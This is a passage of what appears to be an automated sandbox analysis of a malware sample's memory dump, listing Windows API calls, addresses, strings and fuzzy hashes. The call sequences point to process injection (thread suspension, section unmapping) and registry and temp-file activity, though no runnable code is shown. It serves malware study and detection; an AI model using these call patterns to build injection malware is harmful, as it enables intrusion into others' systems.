    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
